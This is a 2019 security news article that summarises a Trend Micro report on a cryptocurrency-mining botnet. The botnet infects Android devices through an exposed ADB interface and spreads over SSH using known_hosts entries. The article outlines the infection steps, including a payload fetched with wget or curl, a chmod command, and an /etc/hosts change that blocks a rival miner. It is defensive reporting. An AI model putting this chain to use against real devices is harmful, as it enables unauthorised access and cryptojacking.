24 June 2019

New crypto-currency mining botnet targets Android devices via open ADB

New crypto-currency mining botnet targets Android devices via open ADB

A new cryptocurrency mining botnet has been discovered that uses the Android Debug Bridge (ADB) Wi-Fi interface and SSH connections to hosts to infect other devices. The botnet malware has spread to 21 countries with the highest rates of infection observed in South Korea, revealed a report from Trend Micro.

While the ADB is disabled on most Android devices by default, some ship with this function enabled thus allowing unauthenticated attackers to connect remotely via the 5555 TCP port and gain direct access via the ADB command shell which is commonly used by developers to install and debug apps.

During the first stage of the attack the IP address 45[.]67[.]14[.]179 connects to a device running ADB and uses the ADB command shell to change the attacked system’s working directory to “/data/local/tmp”. This modification is based on the fact that .tmp files typically have default execution permissions.

The bot then performs a series of scans to determine if it landed on a honeypot and what kind of operating system is running on the targeted device. Next, the malicious implant uses wget to download the payload, and curl if wget is not present in the infected system. The bot then executes the command “chmod 777 a.sh” to change the permission settings of downloaded payload and executes a series of commands to remove its traces.

Once downloaded the payload allows the botnet to chose one of the three miners depending on infected system’s manufacturer, architecture, processor type, and hardware. All three miners are delivered by the same URL.

“To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as “/sbin/sysctl -w vm.nr_hugepages=128,” note the researchers.

Additionally, the bot targets rival cryptocurrency miners if they are found on the victim’s device. It blocks its competitor by modifying /etc/hosts and adding the additional record “0.0.0.0 miningv2.duckdns.org”, which blocks the URL of the competing miner.

One of the interesting aspects of this botnet is the use of a spreading mechanism via SSH which enables it to infect systems listed in the known_hosts file of compromised devices.

“Being a known device means the system can communicate with the other system without any further authentication after the initial key exchange, i.e., each system considers the other as safe. The combination of known hosts and the victim’s public key makes it possible for the malware to connect to smart devices or systems that have previously connected to the infected system,” explains Trend Micro.

Once connected via SSH to another target, the malware uses two spreader scripts to download, install, and launch a miner payload.

Back to the list

Latest Posts

“Agent Smith” malware infected more than 25 million Android devices

“Agent Smith” malware infected more than 25 million Android devices

The malware leverages known Android exploits and automatically replaces installed apps with malicious clones without users’ knowledge or interaction.
15 July 2019
Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Since the beginning of the campaign in April 2019 the group has continuously been scanning the Internet for insecure Amazon S3 buckets.
12 July 2019
Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

The exploit for CVE-2019-1132 created by the Buhtrap group relies on popup menu objects.
11 July 2019
Featured vulnerabilities
Denial of service in MatrixSSL
Medium Patched | 15 Jul, 2019
Denial of service in Apple iMessage
Medium Patched | 15 Jul, 2019
Multiple vulnerabilities in Redis
Medium Patched | 11 Jul, 2019
Reverse Tabnabbing in Quill
Low Not Patched | 11 Jul, 2019
Remote code injection in domokeeper
High Not Patched | 11 Jul, 2019